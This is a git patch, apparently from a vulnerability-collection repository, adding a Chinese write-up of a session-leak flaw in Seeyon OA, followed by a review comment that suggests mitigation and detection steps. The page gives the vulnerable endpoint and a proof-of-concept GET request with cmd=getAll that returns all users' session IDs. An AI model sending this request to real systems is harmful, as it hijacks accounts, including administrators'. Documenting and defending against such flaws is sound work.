From 9ab1f985d6bc3e3c9f0f32f7583ab218ef92d01a Mon Sep 17 00:00:00 2001 From: helloexp <21156949+helloexp@users.noreply.github.com> Date: Wed, 1 Jun 2022 11:01:35 +0800 Subject: [PATCH] =?UTF-8?q?=E8=87=B4=E8=BF=9COA=20Session=E6=B3=84?= =?UTF-8?q?=E6=BC=8F=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../致远OA Session泄漏漏洞.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md diff --git a/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md new file mode 100644 index 0000000..527c551 --- /dev/null +++ b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md @@ -0,0 +1,15 @@ +# 致远OA Session泄漏漏洞 + +## 漏洞位置 +```http request +http://test.com/yyoa/ext/https/getSessionList.jsp +``` +> 当cmd参数为getAll时,便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户,包括管理员 + + +## POC +```http request +http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll +``` + +通过get 方式访问上述url 后,可以在返回包中看到session 信息 \ No newline at end of file
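Review bot: The new page ends at the `## POC` section with no affected-version or remediation information, so it records that `getSessionList.jsp?cmd=getAll` returns every user's SessionID (administrators included) but gives a reader nothing to act on. Suggest adding a section after the POC that states which releases are affected and the vendor fix if known, and that covers mitigation and detection: block or authenticate access to `/yyoa/ext/https/getSessionList.jsp` at the reverse proxy, invalidate active sessions once exposure is suspected, and alert on access-log entries for that path carrying `cmd=getAll`. In the quoted line under `## 漏洞位置`, two sentences are run together at `SessionID利用`; a full stop is needed between them. The file is also added without a trailing newline (`\ No newline at end of file`), which is worth fixing before merge.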